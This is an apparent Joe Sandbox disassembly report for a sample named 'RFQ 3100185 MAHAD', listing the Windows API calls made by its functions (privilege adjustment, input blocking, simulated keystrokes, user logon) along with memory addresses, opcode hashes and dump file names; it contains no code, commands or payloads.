                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: 1b9a14d2b59146e4dd29aa6819fe53021a642edf1788172129a9961394f1a8e3
                                                            • Instruction ID: e6df62ef616ab1b5171759b5f94f256c20d96a7667d27aaf7ee01868b96a8f3c
                                                            • Opcode Fuzzy Hash: 1b9a14d2b59146e4dd29aa6819fe53021a642edf1788172129a9961394f1a8e3
                                                            • Instruction Fuzzy Hash: 4F4105B164460ABFEB609E94DC85EBF77BCFB40368F10502EF305E61C0DA719E419AA0
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 007FE20D
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007FE267
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007FE2B4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: 363a2ab3062db902eeac81601f38b60e6a75cba6828b8e365ffdf5839f7dca7e
                                                            • Instruction ID: f9cf12d06929172e9ac606c5e8bb5a36864a4e85f19fa04ab94b69866bfa6985
                                                            • Opcode Fuzzy Hash: 363a2ab3062db902eeac81601f38b60e6a75cba6828b8e365ffdf5839f7dca7e
                                                            • Instruction Fuzzy Hash: 60213C75A00618EFCB00EFA5D885EAEFBB8FF88310F0484A9E905AB351DB359915CB50
                                                            APIs
                                                              • Part of subcall function 007CF4EA: std::exception::exception.LIBCMT ref: 007CF51E
                                                              • Part of subcall function 007CF4EA: __CxxThrowException@8.LIBCMT ref: 007CF533
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007EB180
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007EB1AD
                                                            • GetLastError.KERNEL32 ref: 007EB1BA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: 8c9b6bcbfa473bea17c70330f7cba1ebb22569d9114acddf50136d0106e29f71
                                                            • Instruction ID: 7caf8099709fdc5647ab59a4773156f300b8b0170bd5d998976b0b5d4992acde
                                                            • Opcode Fuzzy Hash: 8c9b6bcbfa473bea17c70330f7cba1ebb22569d9114acddf50136d0106e29f71
                                                            • Instruction Fuzzy Hash: 2511C1B2504304AFE718AF65ECC5D6BBBBDFB44720B20892EF05693241EB74FC418A60
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007F6623
                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007F6664
                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007F666F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                            • String ID:
                                                            • API String ID: 33631002-0
                                                            • Opcode ID: 1349d2e01b76173df56c39456af7c8c4d045d95a5f2c81e060ad7cf4dfbb91bb
                                                            • Instruction ID: 9454681bb97b3811bff9856c7978e8c8e54032e973b6efc98b2d2b954959ae79
                                                            • Opcode Fuzzy Hash: 1349d2e01b76173df56c39456af7c8c4d045d95a5f2c81e060ad7cf4dfbb91bb
                                                            • Instruction Fuzzy Hash: 5B110C71E01228BFDB108FA5AC45BAEBBBCEB45B10F104556F900E7290D6B45A059BA5
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007F7223
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007F723A
                                                            • FreeSid.ADVAPI32(?), ref: 007F724A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 86beff065c1da20633473d5f12d9ac3e615be3debd99125bf2264a803665f766
                                                            • Instruction ID: 36c6ea1de912a2d04f6c082e0d10ba91c949418275090b470aae8641a9a201ab
                                                            • Opcode Fuzzy Hash: 86beff065c1da20633473d5f12d9ac3e615be3debd99125bf2264a803665f766
                                                            • Instruction Fuzzy Hash: 88F01D76A14309BFDF04DFF4DD99AEEBBB8FF48601F504869A602E2191E2749A448B10
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 007FF599
                                                            • FindClose.KERNEL32(00000000), ref: 007FF5C9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 47a56a0226729ca3f3bf6f99493b0260c41b6a0b24d2b9ee728e86e89a3a07ae
                                                            • Instruction ID: 5115f6fdf14403aa520f2f94a539ede7ded4f50ddee07b74c7e213b6e7e24935
                                                            • Opcode Fuzzy Hash: 47a56a0226729ca3f3bf6f99493b0260c41b6a0b24d2b9ee728e86e89a3a07ae
                                                            • Instruction Fuzzy Hash: F81161726046049FD710EF28D849A2EF7E9FF84324F04891EF9A5DB391DF34A9118B95
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0080BE6A,?,?,00000000,?), ref: 007FCEA7
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0080BE6A,?,?,00000000,?), ref: 007FCEB9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 48b5e90e75d01feffe91ef3f942d433348fcedb362dbca8a2dae0fbb99446638
                                                            • Instruction ID: 89c9d46bf71e8509cee358932cac9dd4c1e67b62583045c05d79f595d6d7b8d5
                                                            • Opcode Fuzzy Hash: 48b5e90e75d01feffe91ef3f942d433348fcedb362dbca8a2dae0fbb99446638
                                                            • Instruction Fuzzy Hash: EEF0823110032DEBDB11ABA4DC49FFA776DBF48351F008565F915D6281D634DA50CBA1
                                                            APIs
                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007F4153
                                                            • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 007F4166
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: InputSendkeybd_event
                                                            • String ID:
                                                            • API String ID: 3536248340-0
                                                            • Opcode ID: e575f749c044dfc0301c6c67b6459385446f7501fd46bd031b23a3c0875a9fe9
                                                            • Instruction ID: 39d07aecf572016867848fc154fd5401b4e2c604c3777118d04457161d6ae3cd
                                                            • Opcode Fuzzy Hash: e575f749c044dfc0301c6c67b6459385446f7501fd46bd031b23a3c0875a9fe9
                                                            • Instruction Fuzzy Hash: 73F0677080034DAFDB058FA4C805BBEBBB0FF00305F00840AF966A6292D7B986129FA0
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007EACC0), ref: 007EAB99
                                                            • CloseHandle.KERNEL32(?,?,007EACC0), ref: 007EABAB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: 3c60df935bc1038dfae20438dcf6a6626c1ea0493825f4c8aae3c14e5f666dc5
                                                            • Instruction ID: 3adcfd84e6bd3f266f62f4af6fe5f481a698f35ba9b82cf382ba9d6e81ec5b8d
                                                            • Opcode Fuzzy Hash: 3c60df935bc1038dfae20438dcf6a6626c1ea0493825f4c8aae3c14e5f666dc5
                                                            • Instruction Fuzzy Hash: 69E0E672004A10EFE7252F55FC09DB777EAEF44320710882DF55A81470D7666C90DB50
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,007D6DB3,-0000031A,?,?,00000001), ref: 007D81B1
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007D81BA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 30285876036ae0664a0dc5ef1c851c90dcf65cf35bb3cdd158a29afc38fbe421
                                                            • Instruction ID: 2d30e7f1fd6b7fb30778cadc99662ca2e3a231ecf645ff27b91e92e1fc403385
                                                            • Opcode Fuzzy Hash: 30285876036ae0664a0dc5ef1c851c90dcf65cf35bb3cdd158a29afc38fbe421
                                                            • Instruction Fuzzy Hash: E3B09231044708ABDB002BA1FC09B987F68FB88656F008410F60D49261AB7258208A92
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: afc4287bcc921d7daa7307c48bc1fb3fb94766412711c96ea49813579fba0c6d
                                                            • Instruction ID: c79d593665abca1966c58ef68b0b4cf9ca02a5764367ee1d76d54054e71429a0
                                                            • Opcode Fuzzy Hash: afc4287bcc921d7daa7307c48bc1fb3fb94766412711c96ea49813579fba0c6d
                                                            • Instruction Fuzzy Hash: 55A21774A04219CFDB28CF58C4947EDBBB1FF88314F2581A9E859AB391D7349A81DF90
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 534fd45e0a6c3da671503193347a7052ac362a034ab039535836067bd3c8700a
                                                            • Instruction ID: 699ff14e8636027b739f49964039d36debacbc6d37045d5f66d44546ffca5ada
                                                            • Opcode Fuzzy Hash: 534fd45e0a6c3da671503193347a7052ac362a034ab039535836067bd3c8700a
                                                            • Instruction Fuzzy Hash: 59320321D69F014DD7239638D832336A2A8EFB73D4F55D737F819B5AA6EB29D8834100
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID:
                                                            • API String ID: 674341424-0
                                                            • Opcode ID: 8b95bff0a139a3f18106ef02667e9c28305917e48694843a220aa37e55507bb7
                                                            • Instruction ID: 6e06c9cae48389ce00e384e6af814c9818fdf240df569e1c181551424fe285de
                                                            • Opcode Fuzzy Hash: 8b95bff0a139a3f18106ef02667e9c28305917e48694843a220aa37e55507bb7
                                                            • Instruction Fuzzy Hash: 772266715083119FD724DF14C894BAEB7E4FF84310F10892DFAAA9B291DB79E945CB82
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f423544dea087a74329dcc553a3529d50a2b5e8156fea4b14b64fc8430227a2e
                                                            • Instruction ID: c30ec4421f3e2ec2b0d1726b98c102d4ea723819bf920d8dae0f4bd3270c1c2f
                                                            • Opcode Fuzzy Hash: f423544dea087a74329dcc553a3529d50a2b5e8156fea4b14b64fc8430227a2e
                                                            • Instruction Fuzzy Hash: 55B1E225D2AF414ED7239639883133AB65CBFBB2D5F91D71BFC1A74D62EB2185838180
                                                            APIs
                                                            • __time64.LIBCMT ref: 007FB6DF
                                                              • Part of subcall function 007D344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007FBDC3,00000000,?,?,?,?,007FBF70,00000000,?), ref: 007D3453
                                                              • Part of subcall function 007D344A: __aulldiv.LIBCMT ref: 007D3473
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID:
                                                            • API String ID: 2893107130-0
                                                            • Opcode ID: 18a9809e372790180ce623520fc99e828f2d8147ca849c5777478f6cfe0b6a92
                                                            • Instruction ID: dd3b9b17f763e86f4986ef5377d2bbf6a2d4894be0ded53d042dac1ff958fc07
                                                            • Opcode Fuzzy Hash: 18a9809e372790180ce623520fc99e828f2d8147ca849c5777478f6cfe0b6a92
                                                            • Instruction Fuzzy Hash: 9221A272634510CBC729CF38D881A62B7E1EB95310B248E6DE1E5CB2C0CB78F945DB54
                                                            APIs
                                                            • BlockInput.USER32(00000001), ref: 00806ACA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            • Opcode ID: c1fa80f8c468a321423e9e17ce9fb811f4358dd1e1097156437473eefb9d6c5f
                                                            • Instruction ID: 5e3f17b3ef063d6018a50fe5669118d5a47a96648b11f3fb5feb78a5be904209
                                                            • Opcode Fuzzy Hash: c1fa80f8c468a321423e9e17ce9fb811f4358dd1e1097156437473eefb9d6c5f
                                                            • Instruction Fuzzy Hash: 65E01235300214AFC750EB69D809E96B7ECFFB4761B04841AE945D7291EAB4E8148BA0
                                                            APIs
                                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 007F750A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            • Opcode ID: 9f885c1d230abdee8a1a8bae89b81512f238e052dbb1eed1e9c763d5d081ae9b
                                                            • Instruction ID: ad10467b1d7c140e6f8c910e3e17ef5d67d835164fd7466cce7537ae2b9407ff
                                                            • Opcode Fuzzy Hash: 9f885c1d230abdee8a1a8bae89b81512f238e052dbb1eed1e9c763d5d081ae9b
                                                            • Instruction Fuzzy Hash: 42D06CA526C64E69E82D4724AC1BFB61A08B340782FD48589B7229A2C0B8A86D25E031
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007EAD3E), ref: 007EB124
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: ebd71d6ce325559589680ebd418d31f0c3f63cbc5404bf7a9763eee18744d634
                                                            • Instruction ID: 88d848f4e2fef3221faf71ada9fcc2b3342297e762689a236b528a0a1e4de8ad
                                                            • Opcode Fuzzy Hash: ebd71d6ce325559589680ebd418d31f0c3f63cbc5404bf7a9763eee18744d634
                                                            • Instruction Fuzzy Hash: B8D09E321A4A4EAEDF029FA4ED06EAE3F6AEB04B01F448511FA15D50A1C775D531AB50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            • Opcode ID: d54492e61d4b9c96b255924eb602dd87b46b952fcf71a03cb8eddd972ece2163
                                                            • Instruction ID: c2b9a579e02a61aff982ab93042a186614db05a7922f43334ead51bea29b850d
                                                            • Opcode Fuzzy Hash: d54492e61d4b9c96b255924eb602dd87b46b952fcf71a03cb8eddd972ece2163
                                                            • Instruction Fuzzy Hash: F9C04CB140051DDFC755DBC0D9449EEB7BCBB04705F105491A105F1110D7709B859B72
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 007D818F
                                                            Memory Dump Source
